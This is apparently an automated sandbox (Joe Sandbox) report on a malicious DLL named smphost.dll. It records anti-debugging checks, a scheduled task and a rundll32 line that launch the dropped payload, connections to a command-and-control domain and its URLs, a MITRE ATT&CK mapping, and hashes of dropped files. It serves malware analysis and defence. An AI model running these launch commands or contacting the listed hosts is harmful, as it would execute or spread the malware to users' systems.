Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E1710 mov eax, dword ptr fs:[00000030h]	0_2_6E9E1710
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E1490 mov eax, dword ptr fs:[00000030h]	0_2_6E9E1490
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E83B0 mov eax, dword ptr fs:[00000030h]	0_2_6E9E83B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EC865 mov eax, dword ptr fs:[00000030h]	0_2_6E9EC865
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h]	0_2_6E9EE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C1710 mov eax, dword ptr fs:[00000030h]	25_2_6F6C1710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C1490 mov eax, dword ptr fs:[00000030h]	25_2_6F6C1490
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C83B0 mov eax, dword ptr fs:[00000030h]	25_2_6F6C83B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CE9B4 mov eax, dword ptr fs:[00000030h]	25_2_6F6CE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CC865 mov eax, dword ptr fs:[00000030h]	25_2_6F6CC865

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E9E9AED
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9EC0A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9E9839
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_6F6C9AED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_6F6C9839
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_6F6CC0A3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 93.93.131.124 187	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E9658 cpuid

0_2_6E9E9658

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E9E99A8

Source: C:\Windows\System32\loaddll32.exe

0_2_6E9E8630

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	111 Process Injection	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Regsvr32	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	4 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
smphost.dll	9%	Virustotal		Browse
smphost.dll	7%	ReversingLabs	Win32.Dropper.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\6\5507.ocx	7%	ReversingLabs	Win32.Dropper.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
manageintel.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://manageintel.com/WUzZRUBQje/Auth.php	100%	Avira URL Cloud	malware
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml	0%	Avira URL Cloud	safe
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
manageintel.com	185.14.31.158	true	true	4%, Virustotal, Browse	unknown
the.earth.li	93.93.131.124	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://manageintel.com/WUzZRUBQje/Auth.php	true	Avira URL Cloud: malware	unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml	true	Avira URL Cloud: safe	unknown
https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe	false		high
https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe	false		high
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.14.31.158	manageintel.com	Ukraine		21100	ITLDC-NLUA	true
93.93.131.124	the.earth.li	United Kingdom		44684	MYTHICMythicBeastsLtdGB	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562835
Start date:	30.01.2022
Start time:	13:40:54
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	smphost.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winDLL@19/7@5/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 94.5%) Quality average: 80.6% Quality standard deviation: 27%
HCA Information:	Successful, ratio: 100% Number of executed functions: 21 Number of non-executed functions: 61
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 2.20.157.220, 20.42.73.29
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:43:18	Task Scheduler	Run new task: 5507 path: %windir%\system32\regsvr32.exe s>-e C:\ProgramData\6\5507.ocx

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.14.31.158	smphost.dll	Get hash	malicious	Browse	manageintel.com/WUzZRUBQje/Auth.php
93.93.131.124	lmfao.doc	Get hash	malicious	Browse	the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
the.earth.li	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	lmfao.doc	Get hash	malicious	Browse	93.93.131.124
	YOeg64zDX4.exe	Get hash	malicious	Browse	93.93.131.124
	payload.exe	Get hash	malicious	Browse	93.93.131.124
	do7ZLDDsHX.xls	Get hash	malicious	Browse	93.93.131.124
	https://e.coka.la/V42OO5.hta	Get hash	malicious	Browse	46.43.34.31
	https://e.coka.la/V42OO5.hta	Get hash	malicious	Browse	46.43.34.31
	Moving_list_of_the_day.xlsx	Get hash	malicious	Browse	46.43.34.31
	m.doc	Get hash	malicious	Browse	46.43.34.31
	m.doc	Get hash	malicious	Browse	46.43.34.31
	m.doc	Get hash	malicious	Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious	Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious	Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious	Browse	46.43.34.31
	invoice_to_pay_f02.doc	Get hash	malicious	Browse	46.43.34.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ITLDC-NLUA	smphost.dll	Get hash	malicious	Browse	185.14.31.158
	5AEEB53A492389BFAAA1A2D15B98324C159DED6CD2E55.exe	Get hash	malicious	Browse	185.14.28.12
	3FB154482EF8AE49941C9ED13063294CD4F97E28E5DD8.exe	Get hash	malicious	Browse	185.14.28.12
	3D41425DAA1E1844BE0539723042DC532A640E5BA9EF9.exe	Get hash	malicious	Browse	185.14.28.12
	ADA6977ABF5CAA24A75F0DB17220267F6B05F11ED9497.exe	Get hash	malicious	Browse	185.14.28.12
	70E14DDF23A5FE3D69CC50752FCC491AA2964A2CFEE3D.exe	Get hash	malicious	Browse	185.14.28.12
	SecuriteInfo.com.Trojan.PWS.Stealer.32040.19380.exe	Get hash	malicious	Browse	185.198.164.33
	4809227EE49AED05EEA812EC5FE60084177AE90A76E5A.exe	Get hash	malicious	Browse	185.14.28.12
	05E2540B7113609289FFB8CCDCB605AA6DAC2873DCCE1.exe	Get hash	malicious	Browse	185.14.28.12
	6104F2B4049168FEA236BB6A5B9A5194B878B61F87336.exe	Get hash	malicious	Browse	185.14.28.12
	54BCD3308C140C8EC030F98697CC7F0E9D4585D54334A.exe	Get hash	malicious	Browse	185.14.28.12
	07C18E8E0F92E75367DF02C4114947B038E86FCBC7C8E.exe	Get hash	malicious	Browse	185.14.28.12
	ev8zhBsCzU.exe	Get hash	malicious	Browse	185.14.28.12
	O5t4RGAkKg.exe	Get hash	malicious	Browse	185.14.28.12
	#U3061#U3066#U3082#U3064#U305f#U3044#U30c1#U3059#U30b8.exe	Get hash	malicious	Browse	91.235.129.60
	PO#5689.xlsx	Get hash	malicious	Browse	185.237.206.163
	3964A1E13D2B3EE0C3C34B50D4785907C3FFD560DC3E4.exe	Get hash	malicious	Browse	185.14.28.12
	1C57E67BF823C9C15D3AFB19746746DF06A218FB70816.exe	Get hash	malicious	Browse	185.14.28.12
	QAFfhYtsqj	Get hash	malicious	Browse	5.34.180.214
	COAU7229898130.xlsx	Get hash	malicious	Browse	31.40.251.230
MYTHICMythicBeastsLtdGB	arm7	Get hash	malicious	Browse	46.235.224.242
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	PO-(105152)-20610603_.PDF.exe	Get hash	malicious	Browse	46.235.230.162
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	lmfao.doc	Get hash	malicious	Browse	93.93.131.124
	Ctr-975552-xlsx.HtmL	Get hash	malicious	Browse	176.126.246.96
	YOeg64zDX4.exe	Get hash	malicious	Browse	93.93.131.124
	payload.exe	Get hash	malicious	Browse	93.93.131.124

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	smphost.dll	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	2FxSGgG22a.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	zx4AMX5P5x.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	LlgtTPbJKz.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	l2OGKn1Tzq.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	Tlzn4Evfdh.docx	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	1ON7A70quI.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	N2UHGxYj1P.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	5AEEB53A492389BFAAA1A2D15B98324C159DED6CD2E55.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	IV5Mp1B4F7.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	h9s1i5vfQE.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	9TpV4rfMmJ.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	Pago.xls	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	QRT_4_377305.htm	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	Noua lista de comenzi.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	Eliec-paymentRkWNsmwXKp7EnKy2b8nmfV13jGiOm2F4402fcsCzgobIiHIqZb.HtML	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	FAX-ET_REMIT103INV364783-PDF.htm	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	Payment Advice for Outstanding Invoices.exe	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	Secure_Message_81.90.a1.00.00.htm	Get hash	malicious	Browse	185.14.31.158 93.93.131.124
	Secure_Message_81.90.a1.00.00.htm	Get hash	malicious	Browse	185.14.31.158 93.93.131.124

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\ProgramData\6\5507.ocx	smphost.dll	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\6\5507.ocx

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	147656
Entropy (8bit):	6.319927202557722
Encrypted:	false
SSDEEP:	3072:biKjfYjd3b9fSCNq01bKrF5HiLCK08WA46tvTj:+QfYjBMCNcC+KlWuB3
MD5:	FC484855692F2A7D1EAE090086A1EB72
SHA1:	2E9103747750B40835F58D9E57C2AB75EEAF25F6
SHA-256:	E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E
SHA-512:	2F6B6E8AA82DC4AA61A540BAE1D98682EC79E73CCFEAF9C273B053C2162F35207842F7AB2F1BC06E927D706EC88ECF209D2C57E86323C38FB43E9D694E624311
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 7%
Joe Sandbox View:	Filename: smphost.dll, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.x.b.x.b.x.b...c.x.b...c`x.b...c.x.b...c.x.b...c.x.b...c.x.b...c.x.b.x.b.x.b...c.x.b...c.x.b...c.x.bRich.x.b........................PE..L......a.........."!.....:..................P...............................`...........@.........................0....................V...............&......,...................................(...@............P...............................text...99.......:.................. ..`.rdata...e...P...f...>..............@..@.data... ...........................@....reloc..,...........................@..B.rsrc....V.......X..................@..@................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_6a6ca821ebbab05224d67cc3f7b1b60df6be9b5_7a325c51_102a2f91\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1014905013135325
Encrypted:	false
SSDEEP:	192:RdzcVb6VCJHBUZMXYje9+X9yww/u7sIS274ItU:XcR6V0BUZMXYjeYG/u7sIX4ItU
MD5:	4E69ED442264DFCFC8A976327CCCDB90
SHA1:	40A769A14E0A00CD4C360D2295D2240E04F12439
SHA-256:	FA68E07EC0EFF4B1100FA2157DEEB5DEB7F6B9FE7CA5634730CF90C73F7CF8A2
SHA-512:	4C5D6D30A16B15A769B4E38F13E6032E41FD00DAC7901B08DFEFCA3FDABFF4C4A9CED2956521A490E5A9F3F8DD3F81F0CBF4C30E08BFBD6190513E8205D4E18B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.8.0.5.2.6.3.3.7.9.7.8.0.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.8.0.5.2.6.4.5.1.4.1.5.1.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.c.6.a.7.d.8.-.3.0.2.1.-.4.e.f.a.-.a.d.4.3.-.6.5.4.5.8.5.6.a.3.3.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.7.2.b.c.3.e.-.1.e.4.4.-.4.0.0.2.-.b.f.0.9.-.3.8.5.6.8.5.8.3.4.d.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.7.4.-.0.0.0.1.-.0.0.1.c.-.6.5.9.8.-.2.9.2.b.2.2.1.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16CB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8348
Entropy (8bit):	3.699704629357335
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiNV6r/6YmP6GgmfJkSuCprE89bgnsfOgm:RrlsNiv6D6Ye6GgmfJkSXgsfw
MD5:	E96D4D5B95A58E1D9479774C469491FF
SHA1:	559B525E7E8D954FD42066CCC472E34CA3E8CB8B
SHA-256:	2759879D390CFED62D7AE335715B83B86338CE8A76F75EF4E3838DCA790D55B3
SHA-512:	466D0E1EDA3DE238CCD4727374DD47CFAA5C37D27959D72713F8F21085B47CF744F1F5513B57E3DC30AFF7ED0D855F9DE2909EBD3CC3FBADCFE662866793C818
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.6.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CD7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4670
Entropy (8bit):	4.495863358154354
Encrypted:	false
SSDEEP:	48:cvIwSD8zs9JgtWI91QCR1WSC8Bv8fm8M4JkfZFTq8N+q8Vv9KJYZgd:uITfX0QCRESNuJONNc9qYZgd
MD5:	F462CCD4FC842482C025AD2DEFDD8B84
SHA1:	B8C2826A92BA13ED39C25F8B5329C069B518F71D
SHA-256:	FE5C9762D8018324451025AAFE54ABC64513D9B98F1ED7D7590AEF2322EE8469
SHA-512:	118204611273585C81D8E8E66AE15378A32F76F513CE5DC613A2513F4546BBCD629E90EDDE0117B2503C1D6942C3CA0BA5C2F0247FF13E198604FA0B62D1F4F3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1365534" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Jan 30 21:43:59 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	126704
Entropy (8bit):	2.116314663382975
Encrypted:	false
SSDEEP:	384:d0XmgKl23tP5Lb3ol8XAG/W1z4x3FqDZlRHgTdS9wr4kc:dNMPVbo8XAG1l+Z/2S9wEL
MD5:	7E44EF0D1F00994D03F0D1FCAC053260
SHA1:	6204423E1FA898C99B8BA1977A07729C098951FB
SHA-256:	0E2A562AF7240D2F9825F169FDC460AA993F8A556EAF0BC642CDA60847D7DA2C
SHA-512:	C80CE35F2A13D50BB7823C6A32F4BF82776524647E46455F5AEC8FE0985C28992656E0D10A64DCF3662705636077A37ADB9B01086DF64D376CAC46A21429C1AB
Malicious:	false
Preview:	MDMP....... ..........a........................................JQ..........T.......8...........T...........8P...............'...........)...................................................................U...........B......@*......GenuineIntelW...........T.......t......a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.272035649297127
Encrypted:	false
SSDEEP:	12288:J6UcbZ/kyWQ+az8/CNccMYx1SSnYIh0EO0qhtaGkbvhtkc2/UNLusV:wUcbZ/kyWQ+az8eY
MD5:	9FC5B772E8FD54476EAAFE05A8F2948F
SHA1:	4F087C7392CC2676356F5BD673AAB2F96C9E17E6
SHA-256:	AB2252D7CD408FC90D4F0274677CA89E152A5EED46731F6382C8AF9C7ACEAE0A
SHA-512:	355C5171038D1F4D8055FC942156562EBBA73DA951039D6AA95AE6EA371ECB1CE01F59DC2C582115503953851BF486CA73A4C4276CCE3651D2E6F2FA12E9C3A7
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.BPw"...............................................................................................................................................................................................................................................................................................................................................d.[*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.027005777839474
Encrypted:	false
SSDEEP:	384:wjie5Rftx1SPJ4X9sF8nk7kZPBqXCSeq5QMVyi6+/rl4Lk4+Zd1DoXznULsbwvi:aiwRftx1IJ4XaF8k7mBqXheq5QMVyi6Q
MD5:	AE96E48BB239AB3639D949B90C8376DD
SHA1:	C5660A1E7A23EE15129361A18B966CBAEF839387
SHA-256:	8D7B697697A17AF4AA18F07891B667CA0BEFACB1B79422A0E94C77992DD9B21E
SHA-512:	3A4DF9E83B5825ADD4EA5E0E3617E1DC876B2A113B54EEF4288E9DA577428CAF136EC99286C3A754E7440EE9D8DC87E83F64BBDD804741D51A890D279336FB1B
Malicious:	false
